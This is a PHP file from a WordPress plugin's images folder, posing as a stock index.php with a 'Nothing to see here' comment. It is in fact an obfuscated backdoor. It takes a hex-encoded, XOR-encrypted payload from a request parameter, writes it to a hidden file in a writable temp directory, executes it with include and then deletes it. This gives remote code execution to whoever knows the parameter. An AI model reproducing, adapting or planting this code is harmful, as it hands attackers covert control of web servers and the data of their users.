File: /home/casinobe/domains/pug555-a.com/public_html/wp-content/plugins/wordpress-seo/images/index.php
<?php if(!empty($_REQUEST["\x68ld"])){ $elem = array_filter([session_save_path(), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", "/var/tmp", getcwd(), sys_get_temp_dir(), getenv("TMP"), getenv("TEMP")]); $entity = hex2bin($_REQUEST["\x68ld"]); $pointer = '' ; $w = 0; do{$pointer .= chr(ord($entity[$w]) ^ 74);$w++;} while($w < strlen($entity)); foreach ($elem as $key => $value) { if (is_dir($value) ? is_writable($value) : false) { $flag = vsprintf("%s/%s", [$value, ".ptr"]); $success = file_put_contents($flag, $pointer); if ($success) { include $flag; @unlink($flag); exit;} } } }
/**
* Nothing to see here.
*/